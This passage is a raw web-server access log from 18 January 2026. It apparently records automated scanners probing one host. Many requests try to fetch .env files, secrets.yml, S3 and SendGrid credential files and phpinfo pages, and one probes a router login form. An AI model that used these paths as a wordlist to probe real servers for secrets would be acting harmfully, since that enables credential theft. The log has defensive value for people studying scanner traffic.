Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:15:52:51 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 45.156.87.161] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Jan/2026:15:54:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:15:55:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:15:58:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 88.214.25.123] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:16:05:54 +0000] 405 - POST http 91.82.83.208 "/" [Client 82.23.183.131] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136." "-" +[18/Jan/2026:16:06:09 +0000] 404 - POST http 91.82.83.208 "/_next" [Client 82.23.183.131] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[18/Jan/2026:16:06:37 +0000] 404 - POST http 91.82.83.208 "/_next/server" [Client 82.23.183.131] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136." "-" +[18/Jan/2026:16:06:53 +0000] 404 - POST http 91.82.83.208 "/app" [Client 82.23.183.131] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36" "-" +[18/Jan/2026:16:07:05 +0000] 404 - POST http 91.82.83.208 "/api/route" [Client 82.23.183.131] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0" "-" +[18/Jan/2026:16:18:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:16:35:44 +0000] 400 - GET http 91.82.83.208 "/version" [Client 152.32.189.134] [Length 252] [Gzip -] "-" "-" +[18/Jan/2026:16:35:45 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.32.189.134] [Length 252] [Gzip -] "-" "-" +[18/Jan/2026:16:35:45 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.32.189.134] [Length 252] [Gzip -] "-" "-" +[18/Jan/2026:16:35:45 +0000] 400 - GET http 91.82.83.208 "/v1" [Client 152.32.189.134] [Length 252] [Gzip -] "-" "-" +[18/Jan/2026:16:35:53 +0000] 400 - - http localhost "-" [Client 152.32.189.134] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:16:35:54 +0000] 400 - - http localhost "-" [Client 152.32.189.134] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:16:35:59 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.32.189.134] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Jan/2026:16:36:03 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.32.254.155] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Jan/2026:16:40:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:16:42:04 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Jan/2026:16:42:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:16:42:24 +0000] 400 - GET http 91.82.83.208 "/" [Client 45.142.154.62] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Jan/2026:16:42:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:16:44:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:16:48:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:17:08:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:17:09:57 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36" "-" +[18/Jan/2026:17:09:58 +0000] 404 - GET http 91.82.83.208 "/.env-dev.conf" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile" "-" +[18/Jan/2026:17:09:58 +0000] 404 - GET http 91.82.83.208 "/.env-devtools" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67" "-" +[18/Jan/2026:17:09:59 +0000] 404 - GET http 91.82.83.208 "/.env-dump.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch; MASEJS)" "-" +[18/Jan/2026:17:10:00 +0000] 404 - GET http 91.82.83.208 "/.env-dump.sql" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SPH-D700 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[18/Jan/2026:17:10:00 +0000] 404 - GET http 91.82.83.208 "/.env-firewall" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31" "-" +[18/Jan/2026:17:10:00 +0000] 404 - GET http 91.82.83.208 "/.env-fixtures" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36" "-" +[18/Jan/2026:17:10:00 +0000] 404 - GET http 91.82.83.208 "/.env-frontend" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.50.2 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7" "-" +[18/Jan/2026:17:10:00 +0000] 404 - GET http 91.82.83.208 "/.env-heapdump" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5" "-" +[18/Jan/2026:17:10:00 +0000] 404 - GET http 91.82.83.208 "/.env-hits.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b4pre) Gecko/2008020708 Firefox/3.0b4pre" "-" +[18/Jan/2026:17:10:01 +0000] 404 - GET http 91.82.83.208 "/.env-html.log" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 3.5.21022; .NET4.0C; Media Center PC 5.0; SLCC1; Tablet PC 2.0; BRI/1; .NET4.0E; EIE10;ENUSWOL)" "-" +[18/Jan/2026:17:10:01 +0000] 404 - GET http 91.82.83.208 "/.env-http.log" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.60" "-" +[18/Jan/2026:17:10:01 +0000] 404 - GET http 91.82.83.208 "/.env-identity" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" "-" +[18/Jan/2026:17:10:01 +0000] 404 - GET http 91.82.83.208 "/.env-iis.conf" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36" "-" +[18/Jan/2026:17:10:01 +0000] 404 - GET http 91.82.83.208 "/.env-info.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.3; en-ca; SGH-I317M Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[18/Jan/2026:17:10:01 +0000] 404 - GET http 91.82.83.208 "/.env-info.log" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G960U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36" "-" +[18/Jan/2026:17:10:01 +0000] 404 - GET http 91.82.83.208 "/.env-json.log" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.162.0 Safari/530.0" "-" +[18/Jan/2026:17:10:01 +0000] 404 - GET http 91.82.83.208 "/.env-keycloak" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9.2009" "-" +[18/Jan/2026:17:10:02 +0000] 404 - GET http 91.82.83.208 "/.env-keys.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A466 Safari/9537.53" "-" +[18/Jan/2026:17:10:02 +0000] 404 - GET http 91.82.83.208 "/.env-logs.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0" "-" +[18/Jan/2026:17:10:02 +0000] 403 - GET http 91.82.83.208 "/.env-mail.log" [Client 78.153.140.151] [Length 150] [Gzip -] "TurnitinBot (https://turnitin.com/robot/crawlerinfo.html)" "-" +[18/Jan/2026:17:10:02 +0000] 404 - GET http 91.82.83.208 "/.env-meta.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" "-" +[18/Jan/2026:17:10:03 +0000] 404 - GET http 91.82.83.208 "/.env-mongoose" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)" "-" +[18/Jan/2026:17:10:03 +0000] 404 - GET http 91.82.83.208 "/.env-node.log" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; U) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4" "-" +[18/Jan/2026:17:10:03 +0000] 404 - GET http 91.82.83.208 "/.env-post.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; LGMS210 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Mobile Safari/537.36" "-" +[18/Jan/2026:17:10:03 +0000] 404 - GET http 91.82.83.208 "/.env-prod.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; GT-N5110 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[18/Jan/2026:17:10:03 +0000] 404 - GET http 91.82.83.208 "/.env-prod.log" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1" "-" +[18/Jan/2026:17:10:04 +0000] 404 - GET http 91.82.83.208 "/.env-s3-creds" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/33.0.1750.152 Chrome/33.0.1750.152 Safari/537.36" "-" +[18/Jan/2026:17:10:04 +0000] 404 - GET http 91.82.83.208 "/.env-scan.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" "-" +[18/Jan/2026:17:10:04 +0000] 404 - GET http 91.82.83.208 "/.env-mail.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/9.64 (X11; Linux x86_64; U; de) Presto/2.1.1" "-" +[18/Jan/2026:17:10:04 +0000] 404 - GET http 91.82.83.208 "/.env-selenium" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" "-" +[18/Jan/2026:17:16:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:17:23:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.68.123.1] [Length 0] [Gzip -] "-" "-" +[18/Jan/2026:17:24:16 +0000] 400 - GET http 91.82.83.208 "/" [Client 206.168.34.201] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Jan/2026:17:24:17 +0000] 400 - - http localhost "-" [Client 206.168.34.201] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:17:24:21 +0000] 400 - GET http 91.82.83.208 "/.well-known/security.txt" [Client 206.168.34.201] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Jan/2026:17:27:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.153.119.119] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Jan/2026:17:32:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:17:32:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:17:35:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:17:41:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:17:46:07 +0000] 404 - POST http 91.82.83.208 "/boaform/admin/formLogin" [Client 104.248.74.23] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://91.82.83.208:80/admin/login.asp" +[18/Jan/2026:17:46:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.248.74.23] [Length 0] [Gzip -] "-" "-" +[18/Jan/2026:17:56:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:17:59:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:18:03:33 +0000] 400 - GET http localhost "/" [Client 45.91.64.7] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)" "-" +[18/Jan/2026:18:04:23 +0000] 400 - GET http 91.82.83.208 "/" [Client 95.215.0.144] [Length 252] [Gzip -] "fasthttp" "-" +[18/Jan/2026:18:04:23 +0000] 400 - GET http 91.82.83.208 "/aaa9" [Client 46.161.50.108] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Jan/2026:18:04:23 +0000] 400 - GET http 91.82.83.208 "/aab9" [Client 46.161.50.108] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Jan/2026:18:04:36 +0000] 400 - GET http 91.82.83.208 "/aaa9" [Client 95.215.0.144] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Jan/2026:18:04:36 +0000] 400 - GET http 91.82.83.208 "/aab9" [Client 95.215.0.144] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Jan/2026:18:06:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:18:23:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 159.203.6.51] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[18/Jan/2026:18:23:36 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:18:23:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:18:24:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:18:31:13 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (U; Windows NT 5.1; en-GB; rv:1.8.1.17) Gecko/20080808 Firefox/2.0.0.17" "-" +[18/Jan/2026:18:31:13 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9" "-" +[18/Jan/2026:18:31:13 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2" "-" +[18/Jan/2026:18:31:13 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.11 Safari/535.19" "-" +[18/Jan/2026:18:31:13 +0000] 404 - GET http 91.82.83.208 "/.env.example" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 OPR/51.0.2830.26" "-" +[18/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4" "-" +[18/Jan/2026:18:31:14 +0000] 200 - GET http 91.82.83.208 "/?phpinfo=-1" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080417 Firefox/2.0.0.14" "-" +[18/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.83.208 "/Backend/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; BRAVIA 2015 Build/LMY48E.S265) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36 OPR/28.0.1754.0 OMI/4.4.22.20.E102586-1.136" "-" +[18/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.83.208 "/Application/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1" "-" +[18/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.83.208 "/sendgrid/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" "-" +[18/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.83.208 "/staging.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.83.208 "/dashboard/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11" "-" +[18/Jan/2026:18:31:15 +0000] 404 - GET http 91.82.83.208 "/php-info" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" "-" +[18/Jan/2026:18:31:15 +0000] 404 - GET http 91.82.83.208 "/services/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4" "-" +[18/Jan/2026:18:31:15 +0000] 404 - GET http 91.82.83.208 "/config/secrets.yml" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:54.0) Gecko/20100101 Firefox/54.0" "-" +[18/Jan/2026:18:31:15 +0000] 404 - GET http 91.82.83.208 "/admin/info.php" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SAMSUNG-SGH-I847 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[18/Jan/2026:18:31:15 +0000] 400 - GET http 91.82.83.208 "/server.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:18:31:16 +0000] 404 - GET http 91.82.83.208 "/env.json" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Ubuntu/11.04 Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.11" "-" +[18/Jan/2026:18:31:16 +0000] 404 - GET http 91.82.83.208 "/core/.env.prod" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Focus/2.0.0.0 Chrome/55.0.2883.91 Mobile Safari/537.36" "-" +[18/Jan/2026:18:31:16 +0000] 404 - GET http 91.82.83.208 "/uploads/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; SM-J327T1 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36" "-" +[18/Jan/2026:18:31:16 +0000] 404 - GET http 91.82.83.208 "/shop/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" "-" +[18/Jan/2026:18:31:17 +0000] 404 - GET http 91.82.83.208 "/assets/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" "-" +[18/Jan/2026:18:31:17 +0000] 404 - GET http 91.82.83.208 "/sendgrid.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; SAMSUNG-SM-T217A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[18/Jan/2026:18:31:17 +0000] 404 - GET http 91.82.83.208 "/sources/.env.prod" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.0.5603M" "-" +[18/Jan/2026:18:31:17 +0000] 404 - GET http 91.82.83.208 "/sources/.env.production" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 v1333515017.9196" "-" +[18/Jan/2026:18:31:17 +0000] 404 - GET http 91.82.83.208 "/v1/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ( .NET CLR 3.5.30729)" "-" +[18/Jan/2026:18:31:18 +0000] 404 - GET http 91.82.83.208 "/js/.env" [Client 